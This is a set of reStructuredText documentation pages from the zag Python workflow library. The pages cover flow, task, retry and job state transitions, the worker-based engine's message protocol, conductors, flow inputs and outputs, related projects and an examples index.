to the ``SUSPENDING`` state immediately. In that state the engine running the
flow waits for running atoms to finish (since the engine can not preempt
atoms that are actively running).
**SUSPENDED** - When no atoms are running and all results received so far have
been saved, the engine transitions the flow from the ``SUSPENDING`` state
to the ``SUSPENDED`` state.
.. note::
The engine may transition the flow to the ``SUCCESS`` state (from the
``SUSPENDING`` state) if all atoms were in fact running (and completed)
before the suspension request was able to be honored (this is due to the lack
of preemption) or to the ``REVERTED`` state if the engine was reverting and
all atoms were reverted while the engine was waiting for running atoms to
finish or to the ``FAILURE`` state if atoms were running or reverted and
some of them had failed.
**RESUMING** - When the engine running a flow is interrupted *'in a
hard way'* (e.g. server crashed), it can be loaded from storage in *any*
state (this is required since it is can not be known what state was last
successfully saved). If the loaded state is not ``PENDING`` (aka, the flow was
never ran) or ``SUCCESS``, ``FAILURE`` or ``REVERTED`` (in which case the flow
has already finished), the flow gets set to the ``RESUMING`` state for the
short time period while it is being loaded from backend storage [a database, a
filesystem...] (this transition is not shown on the diagram). When the flow is
finally loaded, it goes to the ``SUSPENDED`` state.
From the ``SUCCESS``, ``FAILURE`` or ``REVERTED`` states the flow can be ran
again; therefore it is allowable to go back into the ``RUNNING`` state
immediately. One of the possible use cases for this transition is to allow for
alteration of a flow or flow details associated with a previously ran flow
after the flow has finished, and client code wants to ensure that each atom
from this new (potentially updated) flow has its chance to run.
Task
====
.. image:: img/task_states.svg
:width: 660px
:align: center
:alt: Task state transitions
**PENDING** - A task starts its execution lifecycle in this state (it has no
state prior to being ran by an engine, since tasks(s) are just objects that
represent how to accomplish a piece of work). Once it has been transitioned to
the ``PENDING`` state by the engine this means it can be executed immediately
or if needed will wait for all of the atoms it depends on to complete.
.. note::
An engine running a task also transitions the task to the ``PENDING`` state
after it was reverted and its containing flow was restarted or retried.
**IGNORE** - When a conditional decision has been made to skip (not
execute) the task the engine will transition the task to
the ``IGNORE`` state.
**RUNNING** - When an engine running the task starts to execute the task, the
engine will transition the task to the ``RUNNING`` state, and the task will
stay in this state until the tasks :py:meth:`~zag.atom.Atom.execute`
method returns.
**SUCCESS** - The engine running the task transitions the task to this state
after the task has finished successfully (ie no exception/s were raised during
running its :py:meth:`~zag.atom.Atom.execute` method).
**FAILURE** - The engine running the task transitions the task to this state
after it has finished with an error (ie exception/s were raised during
running its :py:meth:`~zag.atom.Atom.execute` method).
**REVERT_FAILURE** - The engine running the task transitions the task to this
state after it has finished with an error (ie exception/s were raised during
running its :py:meth:`~zag.atom.Atom.revert` method).
**REVERTING** - The engine running a task transitions the task to this state
when the containing flow the engine is running starts to revert and
its :py:meth:`~zag.atom.Atom.revert` method is called. Only tasks in
the ``SUCCESS`` or ``FAILURE`` state can be reverted. If this method fails (ie
raises an exception), the task goes to the ``REVERT_FAILURE`` state.
**REVERTED** - The engine running the task transitions the task to this state
after it has successfully reverted the task (ie no exception/s were raised
during running its :py:meth:`~zag.atom.Atom.revert` method).
Retry
=====
.. note::
A retry has the same states as a task and one additional state.
.. image:: img/retry_states.svg
:width: 660px
:align: center
:alt: Retry state transitions
**PENDING** - A retry starts its execution lifecycle in this state (it has no
state prior to being ran by an engine, since retry(s) are just objects that
represent how to retry an associated flow). Once it has been transitioned to
the ``PENDING`` state by the engine this means it can be executed immediately
or if needed will wait for all of the atoms it depends on to complete (in the
retry case the retry object will also be consulted when failures occur in the
flow that the retry is associated with by consulting its
:py:meth:`~zag.retry.Decider.on_failure` method).
.. note::
An engine running a retry also transitions the retry to the ``PENDING`` state
after it was reverted and its associated flow was restarted or retried.
**IGNORE** - When a conditional decision has been made to skip (not
execute) the retry the engine will transition the retry to
the ``IGNORE`` state.
**RUNNING** - When an engine starts to execute the retry, the engine
transitions the retry to the ``RUNNING`` state, and the retry stays in this
state until its :py:meth:`~zag.retry.Retry.execute` method returns.
**SUCCESS** - The engine running the retry transitions it to this state after
it was finished successfully (ie no exception/s were raised during
execution).
**FAILURE** - The engine running the retry transitions the retry to this state
after it has finished with an error (ie exception/s were raised during
running its :py:meth:`~zag.retry.Retry.execute` method).
**REVERT_FAILURE** - The engine running the retry transitions the retry to
this state after it has finished with an error (ie exception/s were raised
during its :py:meth:`~zag.retry.Retry.revert` method).
**REVERTING** - The engine running the retry transitions to this state when
the associated flow the engine is running starts to revert it and its
:py:meth:`~zag.retry.Retry.revert` method is called. Only retries
in ``SUCCESS`` or ``FAILURE`` state can be reverted. If this method fails (ie
raises an exception), the retry goes to the ``REVERT_FAILURE`` state.
**REVERTED** - The engine running the retry transitions the retry to this state
after it has successfully reverted the retry (ie no exception/s were raised
during running its :py:meth:`~zag.retry.Retry.revert` method).
**RETRYING** - If flow that is associated with the current retry was failed and
reverted, the engine prepares the flow for the next run and transitions the
retry to the ``RETRYING`` state.
Jobs
====
.. image:: img/job_states.svg
:width: 500px
:align: center
:alt: Job state transitions
**UNCLAIMED** - A job (with details about what work is to be completed) has
been initially posted (by some posting entity) for work on by some other
entity (for example a :doc:`conductor <conductors>`). This can also be a state
that is entered when some owning entity has manually abandoned (or
lost ownership of) a previously claimed job.
**CLAIMED** - A job that is *actively* owned by some entity; typically that
ownership is tied to jobs persistent data via some ephemeral connection so
that the job ownership is lost (typically automatically or after some
timeout) if that ephemeral connection is lost.
**COMPLETE** - The work defined in the job has been finished by its owning
entity and the job can no longer be processed (and it *may* be removed at
some/any point in the future).
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/states.rst | states.rst |
Overview
========
This is engine that schedules tasks to **workers** -- separate processes
dedicated for certain atoms execution, possibly running on other machines,
connected via `amqp`_ (or other supported `kombu`_ transports).
.. note::
This engine is under active development and is usable and **does** work
but is missing some features (please check the `blueprint page`_ for
known issues and plans) that will make it more production ready.
.. _blueprint page: https://blueprints.launchpad.net/zag?searchtext=wbe
Terminology
-----------
Client
Code or program or service (or user) that uses this library to define
flows and run them via engines.
Transport + protocol
Mechanism (and `protocol`_ on top of that mechanism) used to pass information
between the client and worker (for example amqp as a transport and a json
encoded message format as the protocol).
Executor
Part of the worker-based engine and is used to publish task requests, so
these requests can be accepted and processed by remote workers.
Worker
Workers are started on remote hosts and each has a list of tasks it can
perform (on request). Workers accept and process task requests that are
published by an executor. Several requests can be processed simultaneously
in separate threads (or processes...). For example, an `executor`_ can be
passed to the worker and configured to run in as many threads (green or
not) as desired.
Proxy
Executors interact with workers via a proxy. The proxy maintains the
underlying transport and publishes messages (and invokes callbacks on message
reception).
Requirements
------------
* **Transparent:** it should work as ad-hoc replacement for existing
*(local)* engines with minimal, if any refactoring (e.g. it should be
possible to run the same flows on it without changing client code if
everything is set up and configured properly).
* **Transport-agnostic:** the means of transport should be abstracted so that
we can use `oslo.messaging`_, `gearmand`_, `amqp`_, `zookeeper`_, `marconi`_,
`websockets`_ or anything else that allows for passing information between a
client and a worker.
* **Simple:** it should be simple to write and deploy.
* **Non-uniformity:** it should support non-uniform workers which allows
different workers to execute different sets of atoms depending on the workers
published capabilities.
.. _marconi: https://wiki.openstack.org/wiki/Marconi
.. _zookeeper: http://zookeeper.org/
.. _gearmand: http://gearman.org/
.. _oslo.messaging: https://wiki.openstack.org/wiki/Oslo/Messaging
.. _websockets: http://en.wikipedia.org/wiki/WebSocket
.. _amqp: http://www.amqp.org/
.. _executor: https://docs.python.org/dev/library/concurrent.futures.html#executor-objects
.. _protocol: http://en.wikipedia.org/wiki/Communications_protocol
Design
======
There are two communication sides, the *executor* (and associated engine
derivative) and *worker* that communicate using a proxy component. The proxy
is designed to accept/publish messages from/into a named exchange.
High level architecture
-----------------------
.. image:: img/worker-engine.svg
:height: 340px
:align: right
Executor and worker communication
---------------------------------
Let's consider how communication between an executor and a worker happens.
First of all an engine resolves all atoms dependencies and schedules atoms that
can be performed at the moment. This uses the same scheduling and dependency
resolution logic that is used for every other engine type. Then the atoms which
can be executed immediately (ones that are dependent on outputs of other tasks
will be executed when that output is ready) are executed by the worker-based
engine executor in the following manner:
1. The executor initiates task execution/reversion using a proxy object.
2. :py:class:`~zag.engines.worker_based.proxy.Proxy` publishes task
request (format is described below) into a named exchange using a routing
key that is used to deliver request to particular workers topic. The
executor then waits for the task requests to be accepted and confirmed by
workers. If the executor doesn't get a task confirmation from workers within
the given timeout the task is considered as timed-out and a timeout
exception is raised.
3. A worker receives a request message and starts a new thread for processing
it.
1. The worker dispatches the request (gets desired endpoint that actually
executes the task).
2. If dispatched succeeded then the worker sends a confirmation response
to the executor otherwise the worker sends a failed response along with
a serialized :py:class:`failure <zag.types.failure.Failure>` object
that contains what has failed (and why).
3. The worker executes the task and once it is finished sends the result
back to the originating executor (every time a task progress event is
triggered it sends progress notification to the executor where it is
handled by the engine, dispatching to listeners and so-on).
4. The executor gets the task request confirmation from the worker and the task
request state changes from the ``PENDING`` to the ``RUNNING`` state. Once a
task request is in the ``RUNNING`` state it can't be timed-out (considering
that the task execution process may take an unpredictable amount of time).
5. The executor gets the task execution result from the worker and passes it
back to the executor and worker-based engine to finish task processing (this
repeats for subsequent tasks).
.. note::
:py:class:`~zag.types.failure.Failure` objects are not directly
json-serializable (they contain references to tracebacks which are not
serializable), so they are converted to dicts before sending and converted
from dicts after receiving on both executor & worker sides (this
translation is lossy since the traceback can't be fully retained, due
to its contents containing internal interpreter references and
details).
Protocol
~~~~~~~~
.. automodule:: zag.engines.worker_based.protocol
Examples
~~~~~~~~
Request (execute)
"""""""""""""""""
* **task_name** - full task name to be performed
* **task_cls** - full task class name to be performed
* **action** - task action to be performed (e.g. execute, revert)
* **arguments** - arguments the task action to be called with
* **result** - task execution result (result or
:py:class:`~zag.types.failure.Failure`) *[passed to revert only]*
Additionally, the following parameters are added to the request message:
* **reply_to** - executor named exchange workers will send responses back to
* **correlation_id** - executor request id (since there can be multiple request
being processed simultaneously)
**Example:**
.. code:: json
{
"action": "execute",
"arguments": {
"x": 111
},
"task_cls": "zag.tests.utils.TaskOneArgOneReturn",
"task_name": "zag.tests.utils.TaskOneArgOneReturn",
"task_version": [
1,
0
]
}
Request (revert)
""""""""""""""""
When **reverting:**
.. code:: json
{
"action": "revert",
"arguments": {},
"failures": {
"zag.tests.utils.TaskWithFailure": {
"exc_type_names": [
"RuntimeError",
"StandardError",
"Exception"
],
"exception_str": "Woot!",
"traceback_str": " File \"/homes/harlowja/dev/os/zag/zag/engines/action_engine/executor.py\", line 56, in _execute_task\n result = task.execute(**arguments)\n File \"/homes/harlowja/dev/os/zag/zag/tests/utils.py\", line 165, in execute\n raise RuntimeError('Woot!')\n",
"version": 1
}
},
"result": [
"failure",
{
"exc_type_names": [
"RuntimeError",
"StandardError",
"Exception"
],
"exception_str": "Woot!",
"traceback_str": " File \"/homes/harlowja/dev/os/zag/zag/engines/action_engine/executor.py\", line 56, in _execute_task\n result = task.execute(**arguments)\n File \"/homes/harlowja/dev/os/zag/zag/tests/utils.py\", line 165, in execute\n raise RuntimeError('Woot!')\n",
"version": 1
}
],
"task_cls": "zag.tests.utils.TaskWithFailure",
"task_name": "zag.tests.utils.TaskWithFailure",
"task_version": [
1,
0
]
}
Worker response(s)
""""""""""""""""""
When **running:**
.. code:: json
{
"data": {},
"state": "RUNNING"
}
When **progressing:**
.. code:: json
{
"details": {
"progress": 0.5
},
"event_type": "update_progress",
"state": "EVENT"
}
When **succeeded:**
.. code:: json
{
"data": {
"result": 666
},
"state": "SUCCESS"
}
When **failed:**
.. code:: json
{
"data": {
"result": {
"exc_type_names": [
"RuntimeError",
"StandardError",
"Exception"
],
"exception_str": "Woot!",
"traceback_str": " File \"/homes/harlowja/dev/os/zag/zag/engines/action_engine/executor.py\", line 56, in _execute_task\n result = task.execute(**arguments)\n File \"/homes/harlowja/dev/os/zag/zag/tests/utils.py\", line 165, in execute\n raise RuntimeError('Woot!')\n",
"version": 1
}
},
"state": "FAILURE"
}
Request state transitions
-------------------------
.. image:: img/wbe_request_states.svg
:width: 520px
:align: center
:alt: WBE request state transitions
**WAITING** - Request placed on queue (or other `kombu`_ message bus/transport)
but not *yet* consumed.
**PENDING** - Worker accepted request and is pending to run using its
executor (threads, processes, or other).
**FAILURE** - Worker failed after running request (due to task exception) or
no worker moved/started executing (by placing the request into ``RUNNING``
state) with-in specified time span (this defaults to 60 seconds unless
overridden).
**RUNNING** - Workers executor (using threads, processes...) has started to
run requested task (once this state is transitioned to any request timeout no
longer becomes applicable; since at this point it is unknown how long a task
will run since it can not be determined if a task is just taking a long time
or has failed).
**SUCCESS** - Worker finished running task without exception.
.. note::
During the ``WAITING`` and ``PENDING`` stages the engine keeps track
of how long the request has been *alive* for and if a timeout is reached
the request will automatically transition to ``FAILURE`` and any further
transitions from a worker will be disallowed (for example, if a worker
accepts the request in the future and sets the task to ``PENDING`` this
transition will be logged and ignored). This timeout can be adjusted and/or
removed by setting the engine ``transition_timeout`` option to a
higher/lower value or by setting it to ``None`` (to remove the timeout
completely). In the future this will be improved to be more dynamic
by implementing the blueprints associated with `failover`_ and
`info/resilence`_.
.. _failover: https://blueprints.launchpad.net/zag/+spec/wbe-worker-failover
.. _info/resilence: https://blueprints.launchpad.net/zag/+spec/wbe-worker-info
Usage
=====
Workers
-------
To use the worker based engine a set of workers must first be established on
remote machines. These workers must be provided a list of task objects, task
names, modules names (or entrypoints that can be examined for valid tasks) they
can respond to (this is done so that arbitrary code execution is not possible).
For complete parameters and object usage please visit
:py:class:`~zag.engines.worker_based.worker.Worker`.
**Example:**
.. code:: python
from zag.engines.worker_based import worker as w
config = {
'url': 'amqp://guest:guest@localhost:5672//',
'exchange': 'test-exchange',
'topic': 'test-tasks',
'tasks': ['tasks:TestTask1', 'tasks:TestTask2'],
}
worker = w.Worker(**config)
worker.run()
Engines
-------
To use the worker based engine a flow must be constructed (which contains tasks
that are visible on remote machines) and the specific worker based engine
entrypoint must be selected. Certain configuration options must also be
provided so that the transport backend can be configured and initialized
correctly. Otherwise the usage should be mostly transparent (and is nearly
identical to using any other engine type).
For complete parameters and object usage please see
:py:class:`~zag.engines.worker_based.engine.WorkerBasedActionEngine`.
**Example with amqp transport:**
.. code:: python
flow = lf.Flow('simple-linear').add(...)
eng = zag.engines.load(flow, engine='worker-based',
url='amqp://guest:guest@localhost:5672//',
exchange='test-exchange',
topics=['topic1', 'topic2'])
eng.run()
**Example with filesystem transport:**
.. code:: python
flow = lf.Flow('simple-linear').add(...)
eng = zag.engines.load(flow, engine='worker-based',
exchange='test-exchange',
topics=['topic1', 'topic2'],
transport='filesystem',
transport_options={
'data_folder_in': '/tmp/in',
'data_folder_out': '/tmp/out',
})
eng.run()
Additional supported keyword arguments:
* ``executor``: a class that provides a
:py:class:`~zag.engines.worker_based.executor.WorkerTaskExecutor`
interface; it will be used for executing, reverting and waiting for remote
tasks.
Limitations
===========
* Atoms inside a flow must receive and accept parameters only from the ways
defined in :doc:`persistence <persistence>`. In other words, the task
that is created when a workflow is constructed will not be the same task that
is executed on a remote worker (and any internal state not passed via the
:doc:`input and output <inputs_and_outputs>` mechanism can not be
transferred). This means resource objects (database handles, file
descriptors, sockets, ...) can **not** be directly sent across to remote
workers (instead the configuration that defines how to fetch/create these
objects must be instead).
* Worker-based engines will in the future be able to run lightweight tasks
locally to avoid transport overhead for very simple tasks (currently it will
run even lightweight tasks remotely, which may be non-performant).
* Fault detection, currently when a worker acknowledges a task the engine will
wait for the task result indefinitely (a task may take an indeterminate
amount of time to finish). In the future there needs to be a way to limit
the duration of a remote workers execution (and track their liveness) and
possibly spawn the task on a secondary worker if a timeout is reached (aka
the first worker has died or has stopped responding).
Implementations
===============
.. automodule:: zag.engines.worker_based.engine
Components
----------
.. warning::
External usage of internal engine functions, components and modules should
be kept to a **minimum** as they may be altered, refactored or moved to
other locations **without** notice (and without the typical deprecation
cycle).
.. automodule:: zag.engines.worker_based.dispatcher
.. automodule:: zag.engines.worker_based.endpoint
.. automodule:: zag.engines.worker_based.executor
.. automodule:: zag.engines.worker_based.proxy
.. automodule:: zag.engines.worker_based.worker
.. automodule:: zag.engines.worker_based.types
Finders and advertisers
~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: zag.engines.worker_based.types.WorkerFinder
.. autoclass:: zag.engines.worker_based.types.ProxyWorkerFinder
.. autoclass:: zag.engines.worker_based.types.ToozWorkerAdvertiser
.. autoclass:: zag.engines.worker_based.types.ToozWorkerFinder
.. _kombu: http://kombu.readthedocs.org/
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/workers.rst | workers.rst |
----------
Conductors
----------
.. image:: img/conductor.png
:width: 97px
:alt: Conductor
Overview
========
Conductors provide a mechanism that unifies the various
concepts under a single easy to use (as plug-and-play as we can make it)
construct.
They are responsible for the following:
* Interacting with :doc:`jobboards <jobs>` (examining and claiming
:doc:`jobs <jobs>`).
* Creating :doc:`engines <engines>` from the claimed jobs (using
:ref:`factories <resumption factories>` to reconstruct the contained
tasks and flows to be executed).
* Dispatching the engine using the provided :doc:`persistence <persistence>`
layer and engine configuration.
* Completing or abandoning the claimed :doc:`job <jobs>` (depending on
dispatching and execution outcome).
* *Rinse and repeat*.
.. note::
They are inspired by and have similar responsibilities
as `railroad conductors`_ or `musical conductors`_.
Considerations
==============
Some usage considerations should be used when using a conductor to make sure
it's used in a safe and reliable manner. Eventually we hope to make these
non-issues but for now they are worth mentioning.
Endless cycling
---------------
**What:** Jobs that fail (due to some type of internal error) on one conductor
will be abandoned by that conductor and then another conductor may experience
those same errors and abandon it (and repeat). This will create a job
abandonment cycle that will continue for as long as the job exists in an
claimable state.
**Example:**
.. image:: img/conductor_cycle.png
:scale: 70%
:alt: Conductor cycling
**Alleviate by:**
#. Forcefully delete jobs that have been failing continuously after a given
number of conductor attempts. This can be either done manually or
automatically via scripts (or other associated monitoring) or via
the jobboards :py:func:`~zag.jobs.base.JobBoard.trash` method.
#. Resolve the internal error's cause (storage backend failure, other...).
Interfaces
==========
.. automodule:: zag.conductors.base
.. automodule:: zag.conductors.backends
.. automodule:: zag.conductors.backends.impl_executor
Implementations
===============
Blocking
--------
.. automodule:: zag.conductors.backends.impl_blocking
Non-blocking
------------
.. automodule:: zag.conductors.backends.impl_nonblocking
Hierarchy
=========
.. inheritance-diagram::
zag.conductors.base
zag.conductors.backends.impl_blocking
zag.conductors.backends.impl_nonblocking
zag.conductors.backends.impl_executor
:parts: 1
.. _musical conductors: http://en.wikipedia.org/wiki/Conducting
.. _railroad conductors: http://en.wikipedia.org/wiki/Conductor_%28transportation%29
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/conductors.rst | conductors.rst |
==================
Inputs and outputs
==================
In Zag there are multiple ways to provide inputs for your tasks and flows
and get information from them. This document describes one of them, that
involves task arguments and results. There are also :doc:`notifications
<notifications>`, which allow you to get notified when a task or flow changes
state. You may also opt to use the :doc:`persistence <persistence>` layer
itself directly.
-----------------------
Flow inputs and outputs
-----------------------
Tasks accept inputs via task arguments and provide outputs via task results
(see :doc:`arguments and results <arguments_and_results>` for more details).
This is the standard and recommended way to pass data from one task to another.
Of course not every task argument needs to be provided to some other task of a
flow, and not every task result should be consumed by every task.
If some value is required by one or more tasks of a flow, but it is not
provided by any task, it is considered to be flow input, and **must** be put
into the storage before the flow is run. A set of names required by a flow can
be retrieved via that flow's ``requires`` property. These names can be used to
determine what names may be applicable for placing in storage ahead of time
and which names are not applicable.
All values provided by tasks of the flow are considered to be flow outputs; the
set of names of such values is available via the ``provides`` property of the
flow.
.. testsetup::
from zag import task
from zag.patterns import linear_flow
from zag import engines
from pprint import pprint
For example:
.. doctest::
>>> class MyTask(task.Task):
... def execute(self, **kwargs):
... return 1, 2
...
>>> flow = linear_flow.Flow('test').add(
... MyTask(requires='a', provides=('b', 'c')),
... MyTask(requires='b', provides='d')
... )
>>> flow.requires
frozenset(['a'])
>>> sorted(flow.provides)
['b', 'c', 'd']
.. make vim syntax highlighter happy**
As you can see, this flow does not require b, as it is provided by the fist
task.
.. note::
There is no difference between processing of
:py:class:`Task <zag.task.Task>` and
:py:class:`~zag.retry.Retry` inputs and outputs.
------------------
Engine and storage
------------------
The storage layer is how an engine persists flow and task details (for more
in-depth details see :doc:`persistence <persistence>`).
Inputs
------
As mentioned above, if some value is required by one or more tasks of a flow,
but is not provided by any task, it is considered to be flow input, and
**must** be put into the storage before the flow is run. On failure to do
so :py:class:`~zag.exceptions.MissingDependencies` is raised by the engine
prior to running:
.. doctest::
>>> class CatTalk(task.Task):
... def execute(self, meow):
... print meow
... return "cat"
...
>>> class DogTalk(task.Task):
... def execute(self, woof):
... print woof
... return "dog"
...
>>> flo = linear_flow.Flow("cat-dog")
>>> flo.add(CatTalk(), DogTalk(provides="dog"))
<zag.patterns.linear_flow.Flow object at 0x...>
>>> engines.run(flo)
Traceback (most recent call last):
...
zag.exceptions.MissingDependencies: 'linear_flow.Flow: cat-dog(len=2)' requires ['meow', 'woof'] but no other entity produces said requirements
MissingDependencies: 'execute' method on '__main__.DogTalk==1.0' requires ['woof'] but no other entity produces said requirements
MissingDependencies: 'execute' method on '__main__.CatTalk==1.0' requires ['meow'] but no other entity produces said requirements
The recommended way to provide flow inputs is to use the ``store`` parameter
of the engine helpers (:py:func:`~zag.engines.helpers.run` or
:py:func:`~zag.engines.helpers.load`):
.. doctest::
>>> class CatTalk(task.Task):
... def execute(self, meow):
... print meow
... return "cat"
...
>>> class DogTalk(task.Task):
... def execute(self, woof):
... print woof
... return "dog"
...
>>> flo = linear_flow.Flow("cat-dog")
>>> flo.add(CatTalk(), DogTalk(provides="dog"))
<zag.patterns.linear_flow.Flow object at 0x...>
>>> result = engines.run(flo, store={'meow': 'meow', 'woof': 'woof'})
meow
woof
>>> pprint(result)
{'dog': 'dog', 'meow': 'meow', 'woof': 'woof'}
You can also directly interact with the engine storage layer to add additional
values, note that if this route is used you can't use the helper method
:py:func:`~zag.engines.helpers.run`. Instead,
you must activate the engine's run method directly
:py:func:`~zag.engines.base.EngineBase.run`:
.. doctest::
>>> flo = linear_flow.Flow("cat-dog")
>>> flo.add(CatTalk(), DogTalk(provides="dog"))
<zag.patterns.linear_flow.Flow object at 0x...>
>>> eng = engines.load(flo, store={'meow': 'meow'})
>>> eng.storage.inject({"woof": "bark"})
>>> eng.run()
meow
bark
Outputs
-------
As you can see from examples above, the run method returns all flow outputs in
a ``dict``. This same data can be fetched via
:py:meth:`~zag.storage.Storage.fetch_all` method of the engines storage
object. You can also get single results using the
engines storage objects :py:meth:`~zag.storage.Storage.fetch` method.
For example:
.. doctest::
>>> eng = engines.load(flo, store={'meow': 'meow', 'woof': 'woof'})
>>> eng.run()
meow
woof
>>> pprint(eng.storage.fetch_all())
{'dog': 'dog', 'meow': 'meow', 'woof': 'woof'}
>>> print(eng.storage.fetch("dog"))
dog
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/inputs_and_outputs.rst | inputs_and_outputs.rst |
Libraries & frameworks
----------------------
* `APScheduler`_ (Python)
* `Async`_ (Python)
* `Celery`_ (Python)
* `Graffiti`_ (Python)
* `JobLib`_ (Python)
* `Luigi`_ (Python)
* `Mesos`_ (C/C++)
* `Papy`_ (Python)
* `Parallel Python`_ (Python)
* `RQ`_ (Python)
* `Spiff`_ (Python)
* `TBB Flow`_ (C/C++)
Languages
---------
* `Ani`_
* `Make`_
* `Plaid`_
Services
--------
* `Cloud Dataflow`_
* `Mistral`_
Papers
------
* `Advances in Dataflow Programming Languages`_
Related paradigms
-----------------
* `Dataflow programming`_
* `Programming paradigm(s)`_
.. _APScheduler: http://pythonhosted.org/APScheduler/
.. _Async: http://pypi.python.org/pypi/async
.. _Celery: http://www.celeryproject.org/
.. _Graffiti: http://github.com/SegFaultAX/graffiti
.. _JobLib: http://pythonhosted.org/joblib/index.html
.. _Luigi: http://github.com/spotify/luigi
.. _RQ: http://python-rq.org/
.. _Mistral: http://wiki.openstack.org/wiki/Mistral
.. _Mesos: http://mesos.apache.org/
.. _Parallel Python: http://www.parallelpython.com/
.. _Spiff: http://github.com/knipknap/SpiffWorkflow
.. _Papy: http://code.google.com/p/papy/
.. _Make: http://www.gnu.org/software/make/
.. _Ani: http://code.google.com/p/anic/
.. _Programming paradigm(s): http://en.wikipedia.org/wiki/Programming_paradigm
.. _Plaid: http://www.cs.cmu.edu/~aldrich/plaid/
.. _Advances in Dataflow Programming Languages: http://www.cs.ucf.edu/~dcm/Teaching/COT4810-Spring2011/Literature/DataFlowProgrammingLanguages.pdf
.. _Cloud Dataflow: https://cloud.google.com/dataflow/
.. _TBB Flow: https://www.threadingbuildingblocks.org/tutorial-intel-tbb-flow-graph
.. _Dataflow programming: http://en.wikipedia.org/wiki/Dataflow_programming
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/shelf.rst | shelf.rst |
==========
Examples
==========
While developing Zag the team has worked *hard* to make sure the various
concepts are explained by *relevant* examples. Here are a few selected examples
to get started (ordered by *perceived* complexity):
To explore more of these examples please check out the `examples`_ directory
in the Zag `source tree`_.
.. note::
If the examples provided are not satisfactory (or up to your
standards) contributions are welcome and very much appreciated to help
improve them. The higher the quality and the clearer the examples are the
better and more useful they are for everyone.
.. _examples: http://git.openstack.org/cgit/openstack/zag/tree/zag/examples
.. _source tree: http://git.openstack.org/cgit/openstack/zag/
Hello world
===========
.. note::
Full source located at :example:`hello_world`.
.. literalinclude:: ../../../zag/examples/hello_world.py
:language: python
:linenos:
:lines: 16-
Passing values from and to tasks
================================
.. note::
Full source located at :example:`simple_linear_pass`.
.. literalinclude:: ../../../zag/examples/simple_linear_pass.py
:language: python
:linenos:
:lines: 16-
Using listeners
===============
.. note::
Full source located at :example:`echo_listener`.
.. literalinclude:: ../../../zag/examples/echo_listener.py
:language: python
:linenos:
:lines: 16-
Using listeners (to watch a phone call)
=======================================
.. note::
Full source located at :example:`simple_linear_listening`.
.. literalinclude:: ../../../zag/examples/simple_linear_listening.py
:language: python
:linenos:
:lines: 16-
Dumping a in-memory backend
===========================
.. note::
Full source located at :example:`dump_memory_backend`.
.. literalinclude:: ../../../zag/examples/dump_memory_backend.py
:language: python
:linenos:
:lines: 16-
Making phone calls
==================
.. note::
Full source located at :example:`simple_linear`.
.. literalinclude:: ../../../zag/examples/simple_linear.py
:language: python
:linenos:
:lines: 16-
Making phone calls (automatically reverting)
============================================
.. note::
Full source located at :example:`reverting_linear`.
.. literalinclude:: ../../../zag/examples/reverting_linear.py
:language: python
:linenos:
:lines: 16-
Building a car
==============
.. note::
Full source located at :example:`build_a_car`.
.. literalinclude:: ../../../zag/examples/build_a_car.py
:language: python
:linenos:
:lines: 16-
Iterating over the alphabet (using processes)
=============================================
.. note::
Full source located at :example:`alphabet_soup`.
.. literalinclude:: ../../../zag/examples/alphabet_soup.py
:language: python
:linenos:
:lines: 16-
Watching execution timing
=========================
.. note::
Full source located at :example:`timing_listener`.
.. literalinclude:: ../../../zag/examples/timing_listener.py
:language: python
:linenos:
:lines: 16-
Distance calculator
===================
.. note::
Full source located at :example:`distance_calculator`
.. literalinclude:: ../../../zag/examples/distance_calculator.py
:language: python
:linenos:
:lines: 16-
Table multiplier (in parallel)
==============================
.. note::
Full source located at :example:`parallel_table_multiply`
.. literalinclude:: ../../../zag/examples/parallel_table_multiply.py
:language: python
:linenos:
:lines: 16-
Linear equation solver (explicit dependencies)
==============================================
.. note::
Full source located at :example:`calculate_linear`.
.. literalinclude:: ../../../zag/examples/calculate_linear.py
:language: python
:linenos:
:lines: 16-
Linear equation solver (inferred dependencies)
==============================================
``Source:`` :example:`graph_flow.py`
.. literalinclude:: ../../../zag/examples/graph_flow.py
:language: python
:linenos:
:lines: 16-
Linear equation solver (in parallel)
====================================
.. note::
Full source located at :example:`calculate_in_parallel`
.. literalinclude:: ../../../zag/examples/calculate_in_parallel.py
:language: python
:linenos:
:lines: 16-
Creating a volume (in parallel)
===============================
.. note::
Full source located at :example:`create_parallel_volume`
.. literalinclude:: ../../../zag/examples/create_parallel_volume.py
:language: python
:linenos:
:lines: 16-
Summation mapper(s) and reducer (in parallel)
=============================================
.. note::
Full source located at :example:`simple_map_reduce`
.. literalinclude:: ../../../zag/examples/simple_map_reduce.py
:language: python
:linenos:
:lines: 16-
Sharing a thread pool executor (in parallel)
============================================
.. note::
Full source located at :example:`share_engine_thread`
.. literalinclude:: ../../../zag/examples/share_engine_thread.py
:language: python
:linenos:
:lines: 16-
Storing & emitting a bill
=========================
.. note::
Full source located at :example:`fake_billing`
.. literalinclude:: ../../../zag/examples/fake_billing.py
:language: python
:linenos:
:lines: 16-
Suspending a workflow & resuming
================================
.. note::
Full source located at :example:`resume_from_backend`
.. literalinclude:: ../../../zag/examples/resume_from_backend.py
:language: python
:linenos:
:lines: 16-
Creating a virtual machine (resumable)
======================================
.. note::
Full source located at :example:`resume_vm_boot`
.. literalinclude:: ../../../zag/examples/resume_vm_boot.py
:language: python
:linenos:
:lines: 16-
Creating a volume (resumable)
=============================
.. note::
Full source located at :example:`resume_volume_create`
.. literalinclude:: ../../../zag/examples/resume_volume_create.py
:language: python
:linenos:
:lines: 16-
Running engines via iteration
=============================
.. note::
Full source located at :example:`run_by_iter`
.. literalinclude:: ../../../zag/examples/run_by_iter.py
:language: python
:linenos:
:lines: 16-
Controlling retries using a retry controller
============================================
.. note::
Full source located at :example:`retry_flow`
.. literalinclude:: ../../../zag/examples/retry_flow.py
:language: python
:linenos:
:lines: 16-
Distributed execution (simple)
==============================
.. note::
Full source located at :example:`wbe_simple_linear`
.. literalinclude:: ../../../zag/examples/wbe_simple_linear.py
:language: python
:linenos:
:lines: 16-
Distributed notification (simple)
=================================
.. note::
Full source located at :example:`wbe_event_sender`
.. literalinclude:: ../../../zag/examples/wbe_event_sender.py
:language: python
:linenos:
:lines: 16-
Distributed mandelbrot (complex)
================================
.. note::
Full source located at :example:`wbe_mandelbrot`
